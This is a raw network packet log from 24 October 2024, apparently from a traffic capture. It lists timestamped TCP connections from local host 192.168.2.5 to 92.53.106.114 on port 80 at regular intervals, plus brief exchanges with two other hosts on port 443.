Oct 24, 2024 13:57:09.856033087 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.856126070 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.860542059 CEST	80	49705	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:09.860641956 CEST	49705	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:09.860852957 CEST	49705	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:09.866125107 CEST	80	49705	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.128856897 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.195528984 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.248872042 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:10.248931885 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:10.250626087 CEST	49705	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.250767946 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:10.256169081 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.257107019 CEST	49707	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.259531021 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:10.259562016 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:10.261797905 CEST	80	49704	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.262262106 CEST	49704	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.262407064 CEST	80	49707	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.262506008 CEST	49707	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.263870955 CEST	49707	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.269398928 CEST	80	49707	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.269795895 CEST	80	49707	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.296555996 CEST	80	49705	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.482899904 CEST	80	49705	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:10.487891912 CEST	49705	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:10.881334066 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:10.881509066 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:10.886634111 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:10.886684895 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:10.887135983 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:10.992501974 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:11.146716118 CEST	80	49707	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:11.360827923 CEST	80	49707	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:11.360975027 CEST	49707	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:11.640891075 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:11.683336973 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:11.783907890 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:11.785193920 CEST	443	49706	34.117.59.81	192.168.2.5
Oct 24, 2024 13:57:11.785248995 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:11.786127090 CEST	49706	443	192.168.2.5	34.117.59.81
Oct 24, 2024 13:57:12.048233032 CEST	49707	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:12.140443087 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:12.140471935 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:12.140533924 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:12.156461954 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:12.156477928 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.000639915 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.000716925 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.004314899 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.004326105 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.004632950 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.005918980 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.051320076 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.242109060 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.242655039 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.242753029 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.243535042 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.243567944 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246112108 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246148109 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246359110 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246386051 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246409893 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246428013 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246601105 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246622086 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246661901 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246680021 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246715069 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246733904 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246781111 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246798038 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246860027 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246884108 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246916056 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246946096 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.246972084 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.246987104 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247025013 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247039080 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247059107 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247070074 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247098923 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247129917 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247162104 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247176886 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247210979 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247226954 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247257948 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247272015 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247311115 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247343063 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247364044 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247375965 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247421980 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247421980 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247443914 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247463942 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247503996 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247519016 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247559071 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247575045 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247601986 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247615099 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247657061 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247672081 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247709990 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247709990 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247730970 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247771025 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247796059 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247824907 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247869968 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247885942 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:13.247920990 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247946024 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247967958 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.247993946 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248025894 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248059034 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248092890 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248122931 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248142004 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248178005 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.248178005 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:13.254867077 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:14.154608011 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:14.159749985 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:14.159830093 CEST	443	49708	149.154.167.220	192.168.2.5
Oct 24, 2024 13:57:14.159953117 CEST	49708	443	192.168.2.5	149.154.167.220
Oct 24, 2024 13:57:15.136226892 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:15.141923904 CEST	80	49710	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:15.142039061 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:15.142137051 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:15.148376942 CEST	80	49710	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:15.148544073 CEST	80	49710	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:16.055401087 CEST	80	49710	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:16.180851936 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.116060972 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.116204977 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.121439934 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:21.121505976 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.121901035 CEST	80	49710	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:21.121969938 CEST	49710	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.123254061 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:21.128736019 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:21.128809929 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:22.008099079 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:22.086155891 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:27.024133921 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:27.029642105 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:27.029730082 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:27.299823046 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:27.383025885 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.306746960 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.307929993 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.313308954 CEST	80	49743	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:32.313374043 CEST	49743	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.313447952 CEST	80	49803	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:32.313515902 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.313707113 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:32.319142103 CEST	80	49803	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:32.319341898 CEST	80	49803	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:33.218961954 CEST	80	49803	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:33.383099079 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.227135897 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.227823019 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.233201981 CEST	80	49836	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:38.233287096 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.233417034 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.233455896 CEST	80	49803	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:38.233505964 CEST	49803	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:38.239022970 CEST	80	49836	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:38.239074945 CEST	80	49836	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:39.154059887 CEST	80	49836	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:39.195557117 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.212188005 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.213207006 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.217807055 CEST	80	49836	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:44.217869043 CEST	49836	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.218446970 CEST	80	49865	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:44.218516111 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.218628883 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:44.223951101 CEST	80	49865	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:44.224019051 CEST	80	49865	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:45.108195066 CEST	80	49865	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:45.273628950 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.118027925 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.118874073 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.123822927 CEST	80	49865	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:50.123883963 CEST	49865	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.124255896 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:50.124325037 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.124491930 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:50.129976988 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:50.130033016 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:51.012800932 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:51.070502043 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:56.026618004 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:57:56.032763958 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:56.033183098 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:56.302174091 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:57:56.383033037 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.305486917 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.306232929 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.311306953 CEST	80	49897	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:01.311378002 CEST	49897	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.311628103 CEST	80	49957	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:01.311695099 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.311800957 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:01.317289114 CEST	80	49957	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:01.317301989 CEST	80	49957	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:02.208890915 CEST	80	49957	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:02.273641109 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.228274107 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.228952885 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.235235929 CEST	80	49988	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:07.235297918 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.235419035 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.235553980 CEST	80	49957	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:07.235637903 CEST	49957	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:07.241800070 CEST	80	49988	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:07.242942095 CEST	80	49988	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:08.156704903 CEST	80	49988	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:08.211253881 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.164653063 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.165436029 CEST	49989	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.170676947 CEST	80	49988	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:13.170733929 CEST	49988	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.170768976 CEST	80	49989	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:13.170834064 CEST	49989	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.170948982 CEST	49989	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:13.176314116 CEST	80	49989	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:13.176402092 CEST	80	49989	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:14.067550898 CEST	80	49989	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:14.070837021 CEST	49989	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:14.076733112 CEST	80	49989	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:14.078926086 CEST	49989	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:19.099003077 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:19.104665041 CEST	80	49990	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:19.104739904 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:19.105032921 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:19.110496044 CEST	80	49990	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:19.110563040 CEST	80	49990	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:19.995623112 CEST	80	49990	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:20.195514917 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.008821964 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.009094954 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.014609098 CEST	80	49991	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:25.014694929 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.014734983 CEST	80	49990	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:25.014791965 CEST	49990	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.014847040 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:25.020317078 CEST	80	49991	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:25.020422935 CEST	80	49991	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:25.908720970 CEST	80	49991	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:26.009577036 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.915165901 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.915507078 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.921205044 CEST	80	49991	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:30.921284914 CEST	49991	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.922486067 CEST	80	49992	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:30.922581911 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.923820019 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:30.929554939 CEST	80	49992	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:30.929591894 CEST	80	49992	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:31.816162109 CEST	80	49992	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:32.007977962 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.823615074 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.824084997 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.830144882 CEST	80	49992	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:36.830168962 CEST	80	49993	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:36.830250978 CEST	49992	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.830286026 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.830446959 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:36.836050987 CEST	80	49993	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:36.836065054 CEST	80	49993	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:37.734261990 CEST	80	49993	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:37.773592949 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.744532108 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.748287916 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.752638102 CEST	80	49993	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:42.752696037 CEST	49993	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.754414082 CEST	80	49994	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:42.754614115 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.754949093 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:42.761023045 CEST	80	49994	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:42.761452913 CEST	80	49994	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:43.655886889 CEST	80	49994	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:43.789241076 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.664963007 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.665529013 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.907398939 CEST	80	49995	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:48.907478094 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.907686949 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.909008026 CEST	80	49994	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:48.909073114 CEST	49994	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:48.912944078 CEST	80	49995	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:48.913064957 CEST	80	49995	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:49.795442104 CEST	80	49995	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:49.992315054 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.805372000 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.806165934 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.811158895 CEST	80	49995	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:54.811208963 CEST	49995	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.811490059 CEST	80	49996	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:54.811553001 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.811670065 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:58:54.816955090 CEST	80	49996	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:54.817143917 CEST	80	49996	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:55.695616007 CEST	80	49996	92.53.106.114	192.168.2.5
Oct 24, 2024 13:58:55.804828882 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.711594105 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.712336063 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.717308998 CEST	80	49996	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:00.717365026 CEST	49996	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.717674017 CEST	80	49997	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:00.717734098 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.717962027 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:00.723284960 CEST	80	49997	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:00.723493099 CEST	80	49997	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:01.602400064 CEST	80	49997	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:01.699289083 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.617623091 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.620906115 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.623414993 CEST	80	49997	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:06.623522997 CEST	49997	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.626292944 CEST	80	49998	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:06.626420021 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.626573086 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:06.632972002 CEST	80	49998	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:06.633054018 CEST	80	49998	92.53.106.114	192.168.2.5
